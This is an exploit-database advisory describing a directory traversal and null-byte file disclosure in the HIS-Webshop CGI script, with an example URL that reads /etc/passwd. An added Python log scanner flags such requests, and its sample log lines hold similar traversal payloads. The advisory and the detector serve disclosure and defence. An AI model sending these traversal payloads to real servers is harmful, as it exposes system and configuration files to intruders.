HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure

EDB-ID: 5304
Author: Zero X
Type: webapps
Platform: CGI
Date: 2008-03-24


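HIS-Webshop is a shopping system written in Perl by www.shoppark.de.
The script does not validate the "t" parameter, so a request can use directory traversal and a trailing null byte (%00) to read files on the server.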

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

# milw0rm.com [2008-03-24]
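
Requests of the kind shown in the example above can be found in web-server access logs. The following Python scan is an added example, not part of the original advisory or of the vendor's code; the log layout, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic); log layout is assumed.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Mar/2008:10:00:01 +0000] "GET /cgi-bin/his-webshop.pl?t=start HTTP/1.1" 200 5120
192.0.2.77 - - [24/Mar/2008:10:00:09 +0000] "GET /cgi-bin/his-webshop.pl?t=../../../../etc/passwd%00 HTTP/1.1" 200 1843
192.0.2.77 - - [24/Mar/2008:10:00:12 +0000] "GET /cgi-bin/his-webshop.pl?t=%252e%252e%252fconfig HTTP/1.1" 200 310
192.0.2.10 - - [24/Mar/2008:10:00:20 +0000] "GET /cgi-bin/other.pl?t=../x HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SCRIPT = "his-webshop.pl"

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_reasons(t_value):
    """Return why a 't' value looks like a file-disclosure attempt (empty if clean)."""
    v = fully_decode(t_value).replace("\\", "/")
    reasons = []
    if "\x00" in v:
        reasons.append("null byte")
    if ".." in v.split("/"):
        reasons.append("parent-directory segment")
    if v.startswith("/"):
        reasons.append("absolute path")
    return reasons

def scan(log_text):
    """Return (client, status, reasons) for each flagged his-webshop.pl request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/" + SCRIPT):
            continue
        for t_value in parse_qs(parts.query).get("t", []):
            reasons = suspicious_reasons(t_value)
            if reasons:
                hits.append((client, status, reasons))
    return hits
```

A flagged request that was answered with status 200 deserves priority, since the server returned a body for it.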